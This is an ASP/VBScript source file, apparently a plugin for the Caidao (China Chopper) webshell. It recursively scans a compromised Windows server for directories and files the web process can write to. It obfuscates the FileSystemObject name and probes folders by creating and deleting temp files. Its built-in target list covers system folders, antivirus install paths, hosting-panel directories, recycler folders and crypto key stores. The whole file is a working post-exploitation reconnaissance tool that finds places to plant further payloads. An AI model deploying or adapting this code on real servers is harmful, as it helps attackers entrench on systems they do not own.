webshell/caidao-shell/caidao-plug/asp目录写权限检测.ccc

166 lines
No EOL
20 KiB
Text

Response.Buffer = True
Server.ScriptTimeOut=999999999
CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
'把路径加入 \
function GetFullPath(path)
GetFullPath = path
if Right(path,1) <> "\" then GetFullPath = path&"\" '如果字符最后不是 \ 的就加上
end function
'删除文件
Function Deltextfile(filepath)
On Error Resume Next
Set objFSO = CreateObject(CONST_FSO)
if objFSO.FileExists(filepath) then '检查文件是否存在
objFSO.DeleteFile(filepath)
end if
Set objFSO = nothing
Deltextfile = Err.Number '返回错误码
End Function
'检测目录是否可写 0 为可读写 1为可写不可以删除
Function CheckDirIsOKWrite(DirStr)
On Error Resume Next
Set FSO = Server.CreateObject(CONST_FSO)
filepath = GetFullPath(DirStr)&fso.GettempName
FSO.CreateTextFile(filepath)
CheckDirIsOKWrite = Err.Number '返回错误码
if ShowNoWriteDir and (CheckDirIsOKWrite =70) then
Response.Write "[<font color=#0066FF>目录</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
end if
set fout =Nothing
set FSO = Nothing
Deltextfile(filepath) '删除掉
if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
end Function
'检测文件是否可以修改(此方法是修改属性,可能会有点不准,但基本能用)
function CheckFileWrite(filepath)
On Error Resume Next
Set FSO = Server.CreateObject(CONST_FSO)
set getAtt=FSO.GetFile(filepath)
getAtt.Attributes = getAtt.Attributes
CheckFileWrite = Err.Number
set FSO = Nothing
set getAtt = Nothing
end function
'检测目录的可读写性
function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
On Error Resume Next
Set FSO = Server.CreateObject(CONST_FSO)
B = FSO.FolderExists(Path)
set FSO=nothing
'是否为临时目录和是否要检测
IS_TEMP_DIR = (instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
if B=false then '如果不是目录就进行文件检测
'==========================================================================
Re = CheckFileWrite(Path) '检测是否可写
if Re =0 then
Response.Write "[文件]<font color=red>"&Path&"</font><br>"
b =true
exit function
else
Response.Write "[<font color=red>文件</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"
exit function
end if
'==========================================================================
end if
Path = GetFullPath(Path) '加 \
re = CheckDirIsOKWrite(Path) '当前目录也检测一下
if (re =0) or (re=1) then
Response.Write "[目录]<font color=#0000FF>"& Path&"</font><br>"
end if
Set FSO = Server.CreateObject(CONST_FSO)
set f = fso.getfolder(Path)
if (CheckFile=True) and (IS_TEMP_DIR=false) then
b=false
'======================================
for each file in f.Files
Re = CheckFileWrite(Path&file.name) '检测是否可写
if Re =0 then
Response.Write "[文件]<font color=red>"& Path&file.name&"</font><br>"
b =true
else
if ShowNoWriteDir then Response.Write "[<font color=red>文件</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"
end if
next
if b then response.Flush '如果有内容就刷新客户端显示
'======================================
end if
'============= 目录检测 ================
for each file in f.SubFolders
if CheckNextDir=false then '是否检测下一个目录
re = CheckDirIsOKWrite(Path&file.name)
if (re =0) or (re=1) then
Response.Write "[目录]<font color=#0066FF>"& Path&file.name&"</font><br>"
end if
end if
if (CheckNextDir=True) and (IS_TEMP_DIR=false) then '是否检测下一个目录
ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir '再检测下一个目录
end if
next
'======================================
Set FSO = Nothing
set f = Nothing
end function
if Request("Paths") ="gg" then
Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"
if Session("paths")<>"" then Paths_str=Session("paths")
Response.Write "<form id='form1' name='form1' method='post' action=''>"
Response.Write "<textarea name='Paths' cols='80' rows='10'>"&Paths_str&"</textarea>"
Response.Write "<br />"
Response.Write "<input type='submit' name='button' value='开始检测' />"
Response.Write "<label for='CheckNextDir'>"
Response.Write "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />测试目录 "
Response.Write "</label>"
Response.Write "<label for='CheckFile'>"
Response.Write "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked' />测试文件"
Response.Write "</label>"
Response.Write "<label for='ShowNoWrite'>"
Response.Write "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
Response.Write "显禁写目录和文件</label>"
Response.Write "<label for='NoCheckTemp'>"
Response.Write "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
Response.Write "不检测临时目录</label>"
Response.Write "</form>"
else
Response.Write "<a href=""?"">重新输入路径</a><br>"
CheckFile = True
CheckNextDir = True
ShowNoWriteDir = false
NoCheckTemp = True
'Response.Write "检测可能需要一定的时间请稍等......<br>"
'response.Flush
Session("paths") = "C:\WINDOWS\|C:\Documents and Settings\|C:\Program Files\|C:\WINDOWS\PCHealth\|C:\WINDOWS\system32\|C:\WINDOWS\Registration\|C:\WINDOWS\system32\spool\|C:\WINDOWS\Tasks\|C:\WINDOWS\7i24.com\FreeHost\|C:\WINDOWS\Temp\|C:\WINDOWS\system32\spool\PRINTERS\|C:\WINDOWS\Registration\CRMLog\|C:\WINDOWS\PCHealth\ERRORREP\QHEADLES\|C:\WINDOWS\PCHealth\ERRORREP\QSIGNOFF\|c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\|c:\Program Files\Common Files\|c:\Program Files\Common Files\DU Meter\|C:\Program Files\Microsoft SQL Server\90\Shared\|c:\Program Files\Keniu\Keniu Shadu\ProgramData\|c:\Program Files\Keniu\Keniu Shadu\Temp\|C:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\|c:\Program Files\KSafe\AppData\update\|c:\Program Files\KSafe\AppData\|c:\Program Files\KSafe\Temp\uptemp\|c:\Program Files\KSafe\Temp\|c:\Program Files\KSafe\webui\icon\|c:\Program Files\Rising\RAV\XMLS\|c:\Program Files\Rising\RAV\|C:\Program Files\Zend\ZendOptimizer-3.3.0\|C:\Program Files\Common Files\|c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\|C:\Program Files\Symantec AntiVirus\SAVRT\|C:\Program Files\Zend\ZendOptimizer-3.3.0\docs\|c:\Program Files\Thunder Network\Thunder\|D:\Program Files\Thunder Network\Thunder\ComDlls\|D:\Program Files\Thunder Network\Thunder\Program\|D:\Program Files\Adobe\Reader 9.0\|D:\Program Files\Tencent\|C:\Program Files\Symantec AntiVirus\SAVRT\|C:\Program Files\Zend\ZendOptimizer-3.3.0\docs\|C:\Program Files\360\|C:\Program Files\360\360safe\|C:\Program Files\360\360sd\|C:\Program Files\360\360Se\|c:\Program Files\360\360safe\deepscan\Section\|c:\Program Files\360\360sd\AntiSection\|c:\Program Files\360\360sd\deepscan\Section\|c:\Program Files\360\360safe\deepscan\Section\mutex.db\|c:\Program Files\360\360sd\AntiSection\mutex.db\|c:\Program Files\360\360sd\deepscan\Section\mutex.db\|C:\Program Files\Eset\|C:\Program Files\ESET\ESET NOD32 Antivirus\|C:\Program Files\WinRAR\||C:\Documents and Settings\All Users\|C:\Documents and Settings\All Users\DRM\|C:\Documents and Settings\All Users\Application Data\macfee\|c:\Documents and Settings\All Users\Application Data|c:\Documents and Settings\All Users\Application Data\360safe\|c:\Documents and Settings\All Users\Application Data\360safe\360Disabled\|c:\Documents and Settings\All Users\Application Data\360safe\softmgr\|c:\Documents and Settings\All Users\Application Data\360SD\|c:\Documents and Settings\All Users\Application Data\VMware\|c:\Documents and Settings\All Users\Application Data\VMware\Compatibility\|c:\Documents and Settings\All Users\Application Data\VMware\Compatibility\native\|c:\Documents and Settings\All Users\Application Data\VMware\VMware Tools\|c:\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity\|c:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\|c:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\|c:\Documents and Settings\All Users\Application Data\Microsoft\HTML Help\|c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\|C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\|C:\Documents and Settings\All Users\Application Data\Adobe\|C:\Documents and Settings\All Users\Application Data\kingsoft\kis\KCLT\|C:\Documents and Settings\All Users\Application Data\Thunder Network\|C:\Documents and Settings\All Users\Application Data\VMware\|c:\Documents and Settings\All Users\Application Data\Microsoft\|C:\Documents and Settings\All Users\Application Data\|C:\Documents and Settings\All Users\Application Data\Xunlei\|C:\Documents and Settings\All Users\Application Data\Knsd\|c:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\DSS\MachineKeys\|c:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\|c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\|C:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\|C:\Documents and Settings\All Users\Application Data\ESET\ESET NOD32 Antivirus\|C:\Documents and Settings\All Users\Application Data\ESET\ESET NOD32 Antivirus\Updfiles\|C:\Documents and Settings\All Users\Application Data\ESET\|C:\Documents and Settings\All Users\Documents\My Music\|C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\|C:\Documents and Settings\All Users\Documents\My Music\Sync Playlists\|C:\Documents and Settings\All Users\Documents\My Music\我的播放列表\|C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\|C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\|C:\Documents and Settings\All Users\Application Data\kingsoft\kis\KCLT\|C:\php\PEAR\|C:\7i24.com\iissafe\log\|C:\RECYCLER\|e:\recycler\|f:\recycler\|c:\recycler\|d:\recycler\|C:\php\dev\|d:\~1\|e:\~1\|C:\~1\|C:\php\dev\|C:\KnsdRecycle\|C:\KnsdRecycle\update\|C:\KRSHistory\|C:\KSafeRecycle\|C:\System Volume Information\|c:\|d:\|e:\|f:\|g:\|h:\|"
PathsSplit=Split(Session("paths"),"|")
For i=LBound(PathsSplit) To UBound(PathsSplit)
if instr(PathsSplit(i),":")>0 then
ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
End If
Next
Response.Write "[扫描完成]<br>"
end if